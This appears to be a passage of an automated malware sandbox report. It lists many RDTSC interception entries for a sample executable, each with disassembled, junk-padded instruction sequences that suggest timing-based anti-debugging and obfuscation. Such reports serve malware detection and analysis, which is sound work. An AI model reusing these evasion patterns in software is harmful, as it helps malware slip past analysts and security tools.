                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B6BD second address: 33B6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B6C3 second address: 33B6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B4E0 second address: 33B4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B4E4 second address: 33B4F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F0549119936h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B4F4 second address: 33B4FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B4FC second address: 33B501 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B501 second address: 33B510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F05491602D6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B510 second address: 33B514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 349A3B second address: 349A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F05491602D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 35D840 second address: 35D844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 35D844 second address: 35D852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F05491602E2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 35DB05 second address: 35DB0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 35DB0B second address: 35DB11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 35DB11 second address: 35DB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 35DB1B second address: 35DB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602E1h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F05491602D6h 0x00000014 jmp 00007F05491602DDh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 35F3AA second address: 35F3AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 35F3AE second address: 35F3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 362083 second address: 362087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 362298 second address: 3622B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3622B2 second address: 3622B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3622B8 second address: 3622BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3622BC second address: 3622C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3622C0 second address: 3622E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dx, di 0x0000000e push dword ptr [ebp+122D2AFFh] 0x00000014 mov dword ptr [ebp+122D1B97h], ebx 0x0000001a push D9981F08h 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 363664 second address: 363669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 363669 second address: 363674 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F05491602D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 365492 second address: 3654A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0549119942h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3654A9 second address: 3654BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602DEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27F500 second address: 27F505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49C036F second address: 49C039F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, 4E18DDB6h 0x00000012 jmp 00007F05491602E7h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49C039F second address: 49C0407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119949h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F0549119943h 0x00000014 sbb eax, 7F36D84Eh 0x0000001a jmp 00007F0549119949h 0x0000001f popfd 0x00000020 call 00007F0549119940h 0x00000025 pop eax 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49C0407 second address: 49C0424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dl, D6h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E064F second address: 49E0654 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0654 second address: 49E0664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0664 second address: 49E0668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0668 second address: 49E066E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E066E second address: 49E06C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0549119944h 0x00000009 adc ah, FFFFFF98h 0x0000000c jmp 00007F054911993Bh 0x00000011 popfd 0x00000012 push esi 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F0549119945h 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F054911993Dh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E06C0 second address: 49E06C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E06C6 second address: 49E06E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0549119942h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E06E4 second address: 49E072E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F05491602E6h 0x0000000f push eax 0x00000010 jmp 00007F05491602DBh 0x00000015 xchg eax, ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F05491602E5h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0896 second address: 49E089A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E089A second address: 49E08A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0905 second address: 49E0922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119949h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0983 second address: 49E09D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0EE371E2h 0x00000008 pushfd 0x00000009 jmp 00007F05491602E3h 0x0000000e or cx, 1ADEh 0x00000013 jmp 00007F05491602E9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F05491602DDh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E09D2 second address: 49E09F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119941h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, 3895h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E09F0 second address: 49E0A27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b jmp 00007F05491602E4h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F05491602E0h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0A27 second address: 49D01D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119942h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a retn 0004h 0x0000000d nop 0x0000000e cmp eax, 00000000h 0x00000011 setne al 0x00000014 jmp 00007F0549119932h 0x00000016 xor ebx, ebx 0x00000018 test al, 01h 0x0000001a jne 00007F0549119937h 0x0000001c sub esp, 04h 0x0000001f mov dword ptr [esp], 0000000Dh 0x00000026 call 00007F054DA4709Dh 0x0000002b mov edi, edi 0x0000002d jmp 00007F0549119947h 0x00000032 xchg eax, ebp 0x00000033 jmp 00007F0549119946h 0x00000038 push eax 0x00000039 jmp 00007F054911993Bh 0x0000003e xchg eax, ebp 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jmp 00007F054911993Bh 0x00000047 call 00007F0549119948h 0x0000004c pop eax 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D01D7 second address: 49D01DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D01DD second address: 49D01E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D01E1 second address: 49D01E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D030C second address: 49D0313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0313 second address: 49D0319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0319 second address: 49D031D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0360 second address: 49D037C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602E8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D037C second address: 49D0413 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d jmp 00007F054911993Fh 0x00000012 sub edi, edi 0x00000014 pushad 0x00000015 call 00007F0549119945h 0x0000001a pushfd 0x0000001b jmp 00007F0549119940h 0x00000020 add eax, 44C1C408h 0x00000026 jmp 00007F054911993Bh 0x0000002b popfd 0x0000002c pop esi 0x0000002d pushfd 0x0000002e jmp 00007F0549119949h 0x00000033 sbb cx, 2726h 0x00000038 jmp 00007F0549119941h 0x0000003d popfd 0x0000003e popad 0x0000003f inc ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0413 second address: 49D0417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0417 second address: 49D041D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D041D second address: 49D047F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F05491602E0h 0x00000009 add ax, E3F8h 0x0000000e jmp 00007F05491602DBh 0x00000013 popfd 0x00000014 mov ah, F5h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test al, al 0x0000001b jmp 00007F05491602DBh 0x00000020 je 00007F054916053Ah 0x00000026 pushad 0x00000027 mov edi, eax 0x00000029 mov edi, eax 0x0000002b popad 0x0000002c lea ecx, dword ptr [ebp-14h] 0x0000002f pushad 0x00000030 mov ax, B70Fh 0x00000034 mov cx, B52Bh 0x00000038 popad 0x00000039 mov dword ptr [ebp-14h], edi 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F05491602DDh 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D04B7 second address: 49D0509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov al, 6Ch 0x0000000d pushfd 0x0000000e jmp 00007F0549119943h 0x00000013 or esi, 63D6C53Eh 0x00000019 jmp 00007F0549119949h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 mov si, dx 0x00000025 push eax 0x00000026 push edx 0x00000027 mov esi, ebx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D05BB second address: 49D05C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D05C1 second address: 49D05C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D05C6 second address: 49D060B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F05491602DAh 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test eax, eax 0x0000000f jmp 00007F05491602E1h 0x00000014 jg 00007F05BB3BE177h 0x0000001a jmp 00007F05491602DEh 0x0000001f js 00007F054916038Fh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D060B second address: 49D0628 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119949h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0628 second address: 49D0638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602DCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0638 second address: 49D0695 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [ebp-14h], edi 0x0000000e jmp 00007F0549119946h 0x00000013 jne 00007F05BB37776Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F054911993Dh 0x00000022 sub esi, 782B3BD6h 0x00000028 jmp 00007F0549119941h 0x0000002d popfd 0x0000002e movzx eax, bx 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0695 second address: 49D06B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602E9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D06B2 second address: 49D06B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D06B6 second address: 49D071A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+08h] 0x0000000b jmp 00007F05491602DDh 0x00000010 lea eax, dword ptr [ebp-2Ch] 0x00000013 jmp 00007F05491602DEh 0x00000018 xchg eax, esi 0x00000019 jmp 00007F05491602E0h 0x0000001e push eax 0x0000001f jmp 00007F05491602DBh 0x00000024 xchg eax, esi 0x00000025 jmp 00007F05491602E6h 0x0000002a nop 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D071A second address: 49D071E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D071E second address: 49D0724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0724 second address: 49D0729 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0729 second address: 49D0774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F05491602E7h 0x0000000f nop 0x00000010 pushad 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F05491602E2h 0x00000018 sub esi, 4D4C2DD8h 0x0000001e jmp 00007F05491602DBh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0774 second address: 49D07DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F0549119946h 0x0000000b or esi, 4FF37838h 0x00000011 jmp 00007F054911993Bh 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, ebx 0x00000019 pushad 0x0000001a jmp 00007F0549119944h 0x0000001f mov dl, ch 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 call 00007F0549119949h 0x0000002b pop eax 0x0000002c mov dx, 10A4h 0x00000030 popad 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D07DF second address: 49D07F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 01CCE22Fh 0x00000008 mov cl, 72h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D07F2 second address: 49D07F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D07F6 second address: 49D0836 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007F05491602DEh 0x00000011 add esi, 428F81B8h 0x00000017 jmp 00007F05491602DBh 0x0000001c popfd 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0847 second address: 49D0855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0855 second address: 49D0895 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 jmp 00007F05491602DAh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, eax 0x00000010 jmp 00007F05491602E0h 0x00000015 test esi, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F05491602E7h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0895 second address: 49D0008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 6C53C84Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F05BB3776EBh 0x00000011 xor eax, eax 0x00000013 jmp 00007F05490F306Ah 0x00000018 pop esi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b leave 0x0000001c retn 0004h 0x0000001f nop 0x00000020 xor ebx, ebx 0x00000022 cmp eax, 00000000h 0x00000025 je 00007F0549119A93h 0x0000002b call 00007F054DA46DBDh 0x00000030 mov edi, edi 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0008 second address: 49D000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D000C second address: 49D0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
